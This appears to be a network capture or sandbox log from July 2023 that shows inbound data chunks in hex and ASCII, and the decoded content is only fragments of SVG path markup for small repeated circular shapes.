                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5024INData Raw: 4d 38 32 30 2e 30 35 2c 33 36 35 2e 31 38 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 36 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 32 30 2e 31 33 2c 33 35 36 2e 35 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 36 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 2c 32 2e 38 2c 30 2c
                                                                                                                                                                                                                                                  Data Ascii: M820.05,365.18a2.16,2.16,0,0,1-1.09,2.76,3.17,3.17,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M820.13,356.5a2.16,2.16,0,0,1-1.1,2.76,3.16,3.16,0,0,1-4.12-1.36,3,3,0,0,1,.8-3.58,2.8,2.8,0,
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5040INData Raw: 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 35 34 2e 35 36 2c 34 35 32 2e 33 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38
                                                                                                                                                                                                                                                  Data Ascii: 2.75,3.15,3.15,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M854.56,452.3a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.36,3,3,0,0,1,.79-3.58,2.83,2.83,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5056INData Raw: 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 33 32 2c 33 30 35 61 32 2e 31 34 2c 32 2e 31 34 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e 35 38 2c 32 2e 38 32 2c 32 2e 38 32 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 38 38 32 2e 34 2c 32 39 36 2e 32 39 61 32 2e 31 35 2c
                                                                                                                                                                                                                                                  Data Ascii: .82,2.82,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M882.32,305a2.14,2.14,0,0,1-1.09,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.58,2.82,2.82,0,0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M882.4,296.29a2.15,
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5072INData Raw: 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 35 2c 32 2e 36 35 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 37 35 2c 34 30 30 2e 37 37 61 32 2e 31 35 2c 32 2e 31 35 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 36 2c 33 2e 31 36 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 36 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 33 2c 32 2e 38 33 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 32 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 31 36 2e 38 33 2c 33 39 32 2e 30 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30
                                                                                                                                                                                                                                                  Data Ascii: 0,1,3.62.2,2.65,2.65,0,0,1,0,3.58"></path><path class="cls-9" d="M916.75,400.77a2.15,2.15,0,0,1-1.09,2.75,3.16,3.16,0,0,1-4.13-1.36,3,3,0,0,1,.8-3.58,2.83,2.83,0,0,1,3.62.2,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M916.83,392.09a2.16,2.16,0,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5088INData Raw: 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 35 32 2c 32 35 33 2e 34 34 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 30 39 2c 32 2e 37 35 2c 33 2e 31 35 2c 33 2e 31 35 2c 30 2c 30 2c 31 2d 34 2e 31 33 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 38 2d 33 2e 35 38 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 33 2e 36 32 2e 31 39 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 30 2c 33 2e 35 38 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 39 34 34 2e 36 2c 32 34 34 2e 37 36 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2e 31 2c 32 2e 37 35 2c 33 2e 31 34 2c 33 2e 31 34 2c 30 2c 30 2c 31 2d 34 2e 31 32 2d 31 2e 33 35 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 37 39 2d 33 2e
                                                                                                                                                                                                                                                  Data Ascii: "cls-9" d="M944.52,253.44a2.16,2.16,0,0,1-1.09,2.75,3.15,3.15,0,0,1-4.13-1.35,3,3,0,0,1,.8-3.58,2.81,2.81,0,0,1,3.62.19,2.66,2.66,0,0,1,0,3.58"></path><path class="cls-9" d="M944.6,244.76a2.16,2.16,0,0,1-1.1,2.75,3.14,3.14,0,0,1-4.12-1.35,3,3,0,0,1,.79-3.
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5104INData Raw: 37 37 2c 32 32 35 2e 35 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 34 39 2e 34 37 2c 32 31 36 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33
                                                                                                                                                                                                                                                  Data Ascii: 77,225.59a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M49.47,216.82a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5120INData Raw: 22 20 64 3d 22 4d 38 38 2e 34 32 2c 33 31 32 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 38 38 2e 31 32 2c 33 30 33 2e 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 41 33 2e 32 2c 33 2e 32 2c 30 2c 30 2c 31 2c 38 32 2e 39 2c 33 30 35 61 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30
                                                                                                                                                                                                                                                  Data Ascii: " d="M88.42,312.18a2.18,2.18,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M88.12,303.4a2.19,2.19,0,0,1-1,2.83A3.2,3.2,0,0,1,82.9,305a3,3,0,0,1,.65-3.65,2.86,2.86,0
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5136INData Raw: 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 30 39 2e 38 33 2c 31 35 33 2e 32 35 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20
                                                                                                                                                                                                                                                  Data Ascii: 1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M109.83,153.25a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7"
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5152INData Raw: 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 37 37 2c 32 34 38 2e 36 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 34 38 2e 34 37 2c 32 33 39 2e 38 33 61
                                                                                                                                                                                                                                                  Data Ascii: 2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.77,248.61a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.2,3.61"></path><path class="cls-7" d="M148.47,239.83a
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5168INData Raw: 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 34 38 2c 39 38 2e 34 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 31 37 30 2e 31 38 2c 38 39 2e 36 39 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32
                                                                                                                                                                                                                                                  Data Ascii: 69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.48,98.46a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M170.18,89.69a2.16,2.16,0,0,1-1,2.82
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5184INData Raw: 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 34 32 2c 31 39 33 2e 38 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 30 39 2e 31 33 2c 31 38 35 2e 30 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38
                                                                                                                                                                                                                                                  Data Ascii: ,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M209.42,193.82a2.17,2.17,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M209.13,185.05a2.17,2.17,0,0,1-1,2.82,3.18
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5200INData Raw: 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 33 37 2c 32 38 39 2e 31 38 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 34 38 2e 30 37 2c 32 38 30 2e 34 31 61 32 2e 31 36 2c 32 2e 31 36 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37
                                                                                                                                                                                                                                                  Data Ascii: 9,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.37,289.18a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M248.07,280.41a2.16,2.16,0,0,1-1,2.82,3.17,3.17
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5216INData Raw: 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 37 30 2e 30 38 2c 31 33 39 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 36 39 2e 37 38 2c 31 33 30 2e 32 36 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d
                                                                                                                                                                                                                                                  Data Ascii: "></path><path class="cls-7" d="M270.08,139a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M269.78,130.26a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5232INData Raw: 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 39 2c 32 33 34 2e 34 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 30 38 2e 37 32 2c 32 32 35 2e 36 32 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31
                                                                                                                                                                                                                                                  Data Ascii: h><path class="cls-7" d="M309,234.4a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M308.72,225.62a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5248INData Raw: 3d 22 4d 33 33 30 2e 37 33 2c 38 34 2e 32 35 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 34 37 2e 36 37 2c 33 32 31 61 32 2e 31 38 2c 32 2e 31 38 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: ="M330.73,84.25a2.18,2.18,0,0,1-1,2.83,3.17,3.17,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.87,2.87,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"></path><path class="cls-7" d="M347.67,321a2.18,2.18,0,0,1-1,2.83,3.18,3.18,0,0,1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5264INData Raw: 20 64 3d 22 4d 33 36 39 2e 36 37 2c 31 37 39 2e 36 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 37 2c 32 2e 38 37 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 39 2e 33 38 2c 31 37 30 2e 38 33 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32
                                                                                                                                                                                                                                                  Data Ascii: d="M369.67,179.61a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.87,2.87,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"></path><path class="cls-7" d="M369.38,170.83a2.19,2.19,0,0,1-1,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2
                                                                                                                                                                                                                                                  2023-07-27 19:54:10 UTC5280INData Raw: 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34 2c 32 2e 36 34 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 31 31 2e 37 2c 33 33 39 2e 31 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d
                                                                                                                                                                                                                                                  Data Ascii: 09,2.81,2.81,0,0,1,.59-3.37,2.64,2.64,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"></path><path class="cls-9" d="M311.7,339.13a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.18,3.32"></path><path class=
